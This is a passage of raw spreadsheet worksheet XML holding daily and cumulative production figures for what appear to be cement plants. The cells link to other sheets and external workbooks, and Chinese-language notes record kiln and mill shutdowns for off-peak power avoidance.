        <f>J46+'26'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]27'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]27'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]27'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'26'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]27'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'26'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]27'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'26'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'26'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]27'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]27'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]27'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'26'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]27'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'26'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]27'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'26'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'26'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]27'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]27'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]27'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'26'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]27'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'26'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]27'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'26'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'26'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]27'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]27'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]27'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'26'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]27'!$V$8</f>
        <v>747.72</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'26'!X49</f>
        <v>4965.1289</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>181495.4689</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]27'!$Y$8</f>
        <v>5628.49610000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'26'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'26'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]27'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]27'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]27'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'26'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]27'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'26'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]27'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]27'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]27'!$E$24</f>
        <v>4609</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'26'!H51</f>
        <v>112298.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1488697.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]27'!$I$24</f>
        <v>4099.59</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'26'!K51</f>
        <v>128762.157</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1491886.088</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]27'!$L$24</f>
        <v>32235.5269999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>71.634504444444</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]27'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]27'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]27'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'26'!U51</f>
        <v>5035.2</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68033.671</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]27'!$V$30</f>
        <v>190</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'26'!X51</f>
        <v>4730.788</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>65347.025</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]27'!$Y$30</f>
        <v>3555.78600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]27'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]27'!$E$19</f>
        <v>5859.74000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'26'!H52</f>
        <v>36710.1200000005</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1420277.37</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]27'!$I$19</f>
        <v>3595</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'26'!K52</f>
        <v>103701.373</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1385395.573</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]27'!$L$19</f>
        <v>38055.1900000507</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>26.2449586207246</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'[13]27'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]27'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'26'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]27'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'26'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]27'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]27'!$M$21+'[14]27'!$M$22+'[14]27'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]27'!$N$21+'[14]27'!$N$22+'[14]27'!$N$35</f>
        <v>123.95</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'26'!U53</f>
        <v>1178.51</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39512.937</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]27'!$Q$21+'[14]27'!$Q$22+'[14]27'!$Q$35</f>
        <v>46</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'26'!X53</f>
        <v>889</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40380</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]27'!$T$21+'[14]27'!$T$22+'[14]27'!$T$35</f>
        <v>1938.457</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]27'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'26'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]27'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'26'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]27'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]27'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]27'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]27'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'26'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]27'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'26'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]27'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]27'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'26'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]27'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'26'!K55</f>
        <v>8401.388</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>43837.038</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]27'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]27'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]27'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]27'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]27'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]27'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]27'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]27'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]27'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'26'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'26'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]27'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：0:00-22:10续停；3#磨：8:00-22:20避峰停机；4#磨：8:00-24:00避峰停机。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G57+'26'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'26'!K57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G58+'26'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'26'!K58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G59+'26'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'26'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]27'!$Q$65</f>
        <v>窑:错峰续停。A组磨：0:00-12:30续停。D1#磨：正常，D2#磨：正常。</v>
      </c>
      <c r="R59" s="272"/>
      <c r="S59" s="272"/>
      <c r="T59" s="272"/>
      <c r="U59" s="272"/>
      <c r="V59" s="272"/>
      <c r="W59" s="272"/>
      <c r="X59" s="272"/>
      <c r="Y59" s="272"/>
      <c r="Z59" s="273"/>
    </row>
    <row r="60" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194">
        <f>G60+'26'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'26'!K60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'[14]27'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]27'!$E$6</f>
        <v>4595</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'26'!H61</f>
        <v>102899</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1218772</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]27'!$E$21</f>
        <v>4459.61</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'26'!K61</f>
        <v>106679.08</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1207839.16</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]27'!$H$6</f>
        <v>33989.0899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>65.3636346153844</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'[14]27'!$M$11+'[14]27'!$M$12+'[14]27'!$M$13+'[14]27'!$M$14+'[14]27'!$M$15+'[14]27'!$M$16+'[14]27'!$M$17+'[14]27'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]27'!$N$11+'[14]27'!$N$12+'[14]27'!$N$13+'[14]27'!$N$14+'[14]27'!$N$15+'[14]27'!$N$16+'[14]27'!$N$17+'[14]27'!$N$18</f>
        <v>2613</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'26'!H62</f>
        <v>73030</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>909023.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]27'!$Q$11+'[14]27'!$Q$12+'[14]27'!$Q$13+'[14]27'!$Q$14+'[14]27'!$Q$15+'[14]27'!$Q$16+'[14]27'!$Q$17+'[14]27'!$Q$18</f>
        <v>3308</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'26'!K62</f>
        <v>74087</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>908559.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]27'!$T$11+'[14]27'!$T$12+'[14]27'!$T$13+'[14]27'!$T$14+'[14]27'!$T$15+'[14]27'!$T$16+'[14]27'!$T$17+'[14]27'!$T$18</f>
        <v>17397.6339999999</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>69.5905359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]27'!$Q$71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'[14]27'!$M$19+'[14]27'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]27'!$N$19+'[14]27'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'26'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]27'!$Q$19+'[14]27'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'26'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]27'!$T$19+'[14]27'!$T$20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G64+'26'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'26'!K64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G65+'26'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'26'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]27'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:8:00-24:00避峰停机。2#磨:正常。3#磨:8:00-24:00避峰停机。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G66+'26'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'26'!K66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G67+'26'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'26'!K67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'[15]27'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]27'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'26'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]27'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'26'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]27'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]27'!$Q$77</f>
        <v>1#磨运行正常。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]27'!$D$43+'[15]27'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]27'!$E$43+'[15]27'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'26'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]27'!$H$43+'[15]27'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'26'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]27'!$K$43+'[15]27'!$K$44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'[15]27'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]27'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'26'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]27'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'26'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]27'!$K$45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G71+'26'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'26'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]27'!$Q$80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G72+'26'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'26'!K72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G73+'26'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'26'!K73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G74+'26'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'26'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]27'!$Q$83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G75+'26'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
